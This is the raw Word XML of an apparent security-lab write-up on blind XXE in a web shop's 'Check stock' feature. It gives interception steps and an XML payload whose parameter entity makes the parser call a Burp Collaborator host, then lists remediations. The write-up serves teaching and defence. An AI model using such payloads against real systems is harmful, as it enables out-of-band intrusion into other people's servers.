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B91C" w14:textId="1FC5D7A4" w:rsidR="00320924" w:rsidRDefault="009F1CCE" w:rsidP="00B36D89">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B8C2" w14:textId="40AF721E" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="00DE3034">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to XXE out of band interaction as it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4948">
        <w:t xml:space="preserve">has a "Check stock" feature that parses XML input but does not </w:t>
      </w:r>
      <w:r w:rsidR="00DE3034">
        <w:t>display any unexpected values, and blocks requests containing regular external entities.</w:t>
      </w:r>
      <w:r w:rsidR="005D3446">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470E74">
        <w:t xml:space="preserve">We will </w:t>
      </w:r>
      <w:r w:rsidR="00DE3034">
        <w:t>use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator</w:t>
      </w:r>
      <w:r w:rsidR="005E3653">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364B1E4" w14:textId="77777777" w:rsidR="00B36D89" w:rsidRDefault="00B36D89" w:rsidP="00586A86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5743CB22" w14:textId="427C8B32" w:rsidR="00B36D89" w:rsidRDefault="00B36D89"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1CB7B99E" w14:textId="7A6BDDEC" w:rsidR="00A0135C" w:rsidRDefault="00152623" w:rsidP="0045591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Open the web application and visit any product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241700" w14:textId="700C3741" w:rsidR="00CB17DB" w:rsidRDefault="00CB17DB"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Send a Check Stock request and intercept the POST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Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="3222284E" w:rsidR="00E1363A" w:rsidRDefault="004F232A"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Replace the XML body of the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with the Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57781895" w14:textId="24A79C50" w:rsidR="00C36F78" w:rsidRPr="00E1363A" w:rsidRDefault="00C36F78"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w:t>
      </w:r>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">click Poll Now in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BurpSuite’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collaborator Client and we see that we successfully </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">forced the application to make </w:t>
      </w:r>
      <w:r w:rsidR="00CC224F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">an out of band </w:t>
      </w:r>
      <w:r w:rsidR="003D6F3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405899" w14:textId="77777777" w:rsidR="00A0135C" w:rsidRDefault="00A0135C" w:rsidP="00586A86">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C86D1A" w14:textId="5DAB2FEB" w:rsidR="00A0135C" w:rsidRDefault="00A0135C"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2515470B"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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53257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&lt;!DOCTYPE </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 xml:space="preserve"> [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD065F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&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://3w0co0vuo2ft7atcu3ydqasvnmtch1.burpcollaborator.net"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E3E575"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE68C99"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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACB448"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&lt;</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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CFACE"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;1&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7EAA1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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;1&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>storeId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BCAABD" w14:textId="624F4A7B" w:rsidR="00595F51" w:rsidRDefault="00760ECD" w:rsidP="00760ECD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/</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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E739F1" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCF8D0" w14:textId="5DF26A5C" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1D34A"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Disable External Entity Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The most effective way to prevent XXE attacks is to disable the processing of external entities in the XML parser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3A0B7"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Use Less Complex Data Formats:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If possible, consider using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> complex data formats such as JSON, which don't support external entity references in the same way that XML does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559565D"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Whitelist Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Validate incoming XML using a whitelist to ensure that it only contains expected entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F52E501"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Update XML Libraries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regularly update XML processing libraries or software to the latest versions. Vulnerabilities and their patches often get reported for popular libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28528B"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Sandboxing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you need to parse XML data from untrusted sources, consider doing it in a sandbox environment. This will limit what an attacker can do if they exploit an XXE vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F39003"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Use a Web Application Firewall (WAF):</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider using a WAF with rules configured to block typical XXE payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8A40C"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Restrict Permissions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that the XML processing is run with the least privileges necessary. This way, even if there is an attempt to access local resources, the application doesn't have the necessary permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="5ED1C95A" w:rsidR="00595F51" w:rsidRPr="00916473" w:rsidRDefault="00916473" w:rsidP="00654831">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Network Segmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00916473">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider isolating systems that process XML from sensitive parts of the network.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595F51" w:rsidRPr="00916473" w:rsidSect="00586A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5D1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F46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E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B87AB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471290">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="85599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DD"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00363D89"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="00916473"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EC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2E43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61D4380F-4A9B-4EAE-B2F3-FCA29CB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CD"/>
    <w:pPr>
      <w:keepNext/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>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89"/>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B36D89"/>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5E4E2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5E4E23"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00455916"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00760ECD"/>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8996">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="12633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2023-10-03T05:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T10:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>